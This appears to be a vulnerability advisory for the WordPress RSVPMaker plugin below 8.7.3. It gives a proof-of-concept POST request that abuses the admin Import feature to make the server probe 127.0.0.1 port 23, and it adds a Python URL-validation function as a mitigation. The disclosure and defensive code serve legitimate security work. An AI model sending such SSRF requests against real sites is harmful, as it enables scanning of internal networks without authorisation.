WordPress Plugin Vulnerabilities

RSVPMaker < 8.7.3 - Authenticated (admin+) SSRF

Description

The Import feature of the plugin (/wp-admin/tools.php?page=rsvpmaker_export_screen) takes a URL input and passes it to curl without first validating that it points to a remote host. As a result, a high-privilege user could use that feature to scan the internal network via an SSRF attack.

Proof of Concept

Go to the Import feature (wp-admin/tools.php?page=rsvpmaker_export_screen), enter an internal URL and click 'Import':

POST /wp-json/rsvpmaker/v1/importnow HTTP/1.1
Host: 172.28.128.50
Content-Length: 52
Accept: */*
X-Requested-With: XMLHttpRequest
X-WP-Nonce: b56e26b3f8
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://172.28.128.50
Referer: http://172.28.128.50/wp-admin/tools.php?page=rsvpmaker_export_screen
Accept-Language: en-US,en;q=0.9
Cookie: [admin cookies]
Connection: close

importrsvp=http%3A%2F%2F127.0.0.1%3A23&start=0


Response: cURL error 7: Failed to connect to 127.0.0.1 port 23: Connection refused
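The defensive check the Import feature lacked, added here as an example rather than code from the plugin or its fix: accept only http(s) URLs whose host resolves exclusively to globally routable addresses, which rejects the 127.0.0.1 target from the request above as well as private, link-local and IPv4-mapped addresses. The function and helper names are hypothetical, and the optional resolver argument exists so the check can be exercised without live DNS.

```python
"""Validate a user-supplied import URL before fetching it (SSRF mitigation).

Added example, not the plugin's own code: the advisory describes a URL
passed straight to curl. Here the URL is checked first and only http(s)
targets resolving to public addresses are allowed.
"""
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}


def resolve_host(host):
    """Resolve a hostname to its IP address strings using system DNS."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


def is_safe_import_url(url, resolver=resolve_host):
    """Return True only if url is http(s) and every address its host
    resolves to is globally routable (not loopback, private, link-local,
    multicast or otherwise reserved)."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES or not parts.hostname:
        return False
    host = parts.hostname
    try:
        # A literal IP address (including bracketed IPv6) needs no lookup.
        addrs = [str(ipaddress.ip_address(host))]
    except ValueError:
        try:
            addrs = resolver(host)
        except OSError:  # socket.gaierror is a subclass of OSError
            return False
    if not addrs:
        return False
    for addr in addrs:
        ip = ipaddress.ip_address(addr)
        # Unwrap IPv4-mapped IPv6 (::ffff:10.0.0.1) and judge the inner v4.
        if ip.version == 6 and ip.ipv4_mapped is not None:
            ip = ip.ipv4_mapped
        if not ip.is_global:
            return False
    return True
```

To avoid a DNS-rebinding gap between check and fetch, connect to the address that was validated rather than resolving the hostname a second time.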

Affects Plugins

Fixed in 8.7.3

References

Classification

Type
SSRF
OWASP top 10
CWE

Miscellaneous

Original Researcher
Shreya Pohekar of Codevigilant Project
Verified
Yes

Timeline

Publicly Published
2021-06-29 (about 2 years ago)
Added
2021-06-29 (about 2 years ago)
Last Updated
2022-01-17 (about 2 years ago)

Other